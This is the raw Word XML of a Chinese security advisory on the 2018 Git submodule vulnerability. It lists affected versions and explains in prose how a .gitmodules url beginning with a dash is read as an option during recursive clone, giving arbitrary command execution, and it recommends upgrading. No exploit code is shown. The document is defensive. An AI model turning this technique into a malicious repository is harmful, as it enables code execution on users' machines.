              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>早于</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>2.14.5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>的2.14.x版本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hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>早于</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>2.15.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>2.15.x</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>版本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hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>早于</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2.16.5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2.16.x</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>版本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hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>早于</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>2.17.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>2.17.x</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>版本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hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>早于</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>2.18.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>2.18.x</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>版本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>早于</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>2.19.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>2.19.x</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>及更早的版本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  <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>来源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https://blog.github.com/2018-10-05-git-submodule-vulnerability/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漏洞简介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rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>此漏洞允许.gitModule文件中的url参数以破折号“—”开头，在执行“git clone”操作时，进程将此url解析为选项，从而导致任意命令执行</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman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漏洞详情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/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>当运行git clone --recurse-submodules时，git会解析.gitmodules文件中的url字段，然后将其作为参数传递给git clone子进程。如果url字段是一个字符串，并使用短划线（-）开头，这个git clone子进程将会把url翻译为一个选项。这可能导致用户运行“git clone”时，会执行任意脚本。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pStyle w:val="18"/>
              <w:spacing w:line="480" w:lineRule="auto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</w:rPr>
              <w:t>参考链接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pStyle w:val="18"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>https://blog.github.com/2018-10-05-git-submodule-vulnerability/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靶场信息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480" w:lineRule="auto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本机搭建靶场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POC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480" w:lineRule="auto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如上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CFCECE" w:themeFill="background2" w:themeFillShade="E5"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:jc w:val="center"/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kern w:val="21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>修复方案</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781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spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Git官方已经发布了新版本修复了上述漏洞，请受影响的用户尽快下载更新进行防护，在升级完成之前，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t>用户应尽量避免clone不受信任的库来保护自身系统安全。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p/>
    <w:sectPr>
      <w:footerReference r:id="rId4" w:type="default"/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rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28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6" name="文本框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8"/>
                            <w:rPr>
                              <w:rFonts w:eastAsia="等线"/>
                            </w:rPr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3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g/nr5S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8"/>
                      <w:rPr>
                        <w:rFonts w:eastAsia="等线"/>
                      </w:rPr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3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right"/>
      <w:rPr>
        <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="114300" distR="114300">
          <wp:extent cx="899160" cy="359410"/>
          <wp:effectExtent l="0" t="0" r="0" b="6350"/>
          <wp:docPr id="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9160" cy="3594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C4CA55"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5C4CA55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0MTdmYTY2NGExYmRlNmIzN2E1ZTEyZDIxYTNmMDYifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="05D969B9"/>
    <w:rsid w:val="001277A1"/>
    <w:rsid w:val="001503F0"/>
    <w:rsid w:val="004953C9"/>
    <w:rsid w:val="004C741B"/>
    <w:rsid w:val="00517E86"/>
    <w:rsid w:val="005E78E8"/>
    <w:rsid w:val="00633FDD"/>
    <w:rsid w:val="006373B3"/>
    <w:rsid w:val="00645E2B"/>
    <w:rsid w:val="006953BC"/>
    <w:rsid w:val="006D3CEC"/>
    <w:rsid w:val="00830326"/>
    <w:rsid w:val="00886F98"/>
    <w:rsid w:val="008D5D8F"/>
    <w:rsid w:val="00A72F07"/>
    <w:rsid w:val="00B03A01"/>
    <w:rsid w:val="00B46086"/>
    <w:rsid w:val="00B60DA3"/>
    <w:rsid w:val="00E37F57"/>
    <w:rsid w:val="00E97D13"/>
    <w:rsid w:val="00E97D68"/>
    <w:rsid w:val="00F33EA6"/>
    <w:rsid w:val="00FD119F"/>
    <w:rsid w:val="02717BDA"/>
    <w:rsid w:val="02AF01BF"/>
    <w:rsid w:val="02E64FE7"/>
    <w:rsid w:val="041F7163"/>
    <w:rsid w:val="0492170E"/>
    <w:rsid w:val="05D969B9"/>
    <w:rsid w:val="07F41CF0"/>
    <w:rsid w:val="09024860"/>
    <w:rsid w:val="09CA347F"/>
    <w:rsid w:val="0D8419EE"/>
    <w:rsid w:val="0E697ED8"/>
    <w:rsid w:val="10F468BD"/>
    <w:rsid w:val="110B6818"/>
    <w:rsid w:val="11CA4BF1"/>
    <w:rsid w:val="123563C8"/>
    <w:rsid w:val="1312710D"/>
    <w:rsid w:val="13F42360"/>
    <w:rsid w:val="15E33312"/>
    <w:rsid w:val="1662251B"/>
    <w:rsid w:val="17EC4ACC"/>
    <w:rsid w:val="1A015C5B"/>
    <w:rsid w:val="1A5C77AA"/>
    <w:rsid w:val="206733F1"/>
    <w:rsid w:val="23CF7338"/>
    <w:rsid w:val="241F1A4B"/>
    <w:rsid w:val="24391F24"/>
    <w:rsid w:val="24FD3C49"/>
    <w:rsid w:val="252424BD"/>
    <w:rsid w:val="25C879F4"/>
    <w:rsid w:val="260400FD"/>
    <w:rsid w:val="27AE3812"/>
    <w:rsid w:val="2A3B03A7"/>
    <w:rsid w:val="2D746A57"/>
    <w:rsid w:val="2E360464"/>
    <w:rsid w:val="2E7710F9"/>
    <w:rsid w:val="2FC007D0"/>
    <w:rsid w:val="3019287F"/>
    <w:rsid w:val="30F566DB"/>
    <w:rsid w:val="31061858"/>
    <w:rsid w:val="32A76E5F"/>
    <w:rsid w:val="344416FF"/>
    <w:rsid w:val="356F095A"/>
    <w:rsid w:val="3745026D"/>
    <w:rsid w:val="37B74831"/>
    <w:rsid w:val="39785A2E"/>
    <w:rsid w:val="3ABD17B1"/>
    <w:rsid w:val="3B4960D5"/>
    <w:rsid w:val="3B6407A6"/>
    <w:rsid w:val="3C352E0B"/>
    <w:rsid w:val="3C8F5424"/>
    <w:rsid w:val="3D4174B8"/>
    <w:rsid w:val="3EAE274A"/>
    <w:rsid w:val="3EF06C30"/>
    <w:rsid w:val="3F4D7CD4"/>
    <w:rsid w:val="42A229CE"/>
    <w:rsid w:val="43AF52EC"/>
    <w:rsid w:val="443033C5"/>
    <w:rsid w:val="45306C87"/>
    <w:rsid w:val="46016203"/>
    <w:rsid w:val="46074891"/>
    <w:rsid w:val="46537607"/>
    <w:rsid w:val="49B272F8"/>
    <w:rsid w:val="49CA61CE"/>
    <w:rsid w:val="4A2B4DFE"/>
    <w:rsid w:val="4D174235"/>
    <w:rsid w:val="4D5E093E"/>
    <w:rsid w:val="4E3F7277"/>
    <w:rsid w:val="51175088"/>
    <w:rsid w:val="534A3B3F"/>
    <w:rsid w:val="539E4E1F"/>
    <w:rsid w:val="562522C8"/>
    <w:rsid w:val="56597FDF"/>
    <w:rsid w:val="57CA77F7"/>
    <w:rsid w:val="587310CB"/>
    <w:rsid w:val="587C752E"/>
    <w:rsid w:val="59176FA5"/>
    <w:rsid w:val="5A0A3324"/>
    <w:rsid w:val="5D652628"/>
    <w:rsid w:val="5E444CF8"/>
    <w:rsid w:val="5E6F5943"/>
    <w:rsid w:val="602B6C52"/>
    <w:rsid w:val="627272D1"/>
    <w:rsid w:val="65EB11B2"/>
    <w:rsid w:val="67AD3D48"/>
    <w:rsid w:val="67EE2D96"/>
    <w:rsid w:val="69D44D20"/>
    <w:rsid w:val="6C814395"/>
    <w:rsid w:val="6C896684"/>
    <w:rsid w:val="6CA850CC"/>
    <w:rsid w:val="6D011153"/>
    <w:rsid w:val="6E3F2638"/>
    <w:rsid w:val="6E42218C"/>
    <w:rsid w:val="6E477EC5"/>
    <w:rsid w:val="6E753858"/>
    <w:rsid w:val="6F871FE7"/>
    <w:rsid w:val="706D7219"/>
    <w:rsid w:val="71254180"/>
    <w:rsid w:val="71305E2E"/>
    <w:rsid w:val="72320FFF"/>
    <w:rsid w:val="72DA4BDC"/>
    <w:rsid w:val="72FE5900"/>
    <w:rsid w:val="73322039"/>
    <w:rsid w:val="7645444A"/>
    <w:rsid w:val="768550F4"/>
    <w:rsid w:val="76F61765"/>
    <w:rsid w:val="777357F7"/>
    <w:rsid w:val="777D7D00"/>
    <w:rsid w:val="78A85C56"/>
    <w:rsid w:val="792040DD"/>
    <w:rsid w:val="7A0B226D"/>
    <w:rsid w:val="7A0D7DAE"/>
    <w:rsid w:val="7C517C20"/>
    <w:rsid w:val="7CD53EAF"/>
    <w:rsid w:val="7D5D702B"/>
    <w:rsid w:val="7DBA55B4"/>
    <w:rsid w:val="7E6261CF"/>
    <w:rsid w:val="7E896EF4"/>
    <w:rsid w:val="7ECF1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qFormat="1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100" w:beforeLines="100" w:after="100" w:afterLines="100" w:line="400" w:lineRule="exact"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="50" w:beforeLines="50" w:after="50" w:afterLines="50" w:line="400" w:lineRule="exact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qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:line="400" w:lineRule="exact"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="30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cs="黑体"/>
      <w:b/>
      <w:sz w:val="28"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:default="1" w:styleId="14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ody Text Indent 2"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
      </w:tabs>
      <w:ind w:firstLine="480" w:firstLineChars="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="8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9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0">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="11">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:ind w:left="420" w:leftChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="12">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:left="1680"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="15">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="14"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="16">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="1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7">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="18">
    <w:name w:val="A表格文字居中"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:before="60" w:after="60"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:kern w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="19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0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1567</Words>
  <Characters>3734</Characters>
  <Lines>12</Lines>
  <Paragraphs>3</Paragraphs>
  <TotalTime>12</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4282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2021-07-06T05:38:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>微信用户</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-20T09:32:45Z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36EF444D9CE24711A852D66AB17A9E25_13</vt:lpwstr>
  </property>
</Properties>
</file>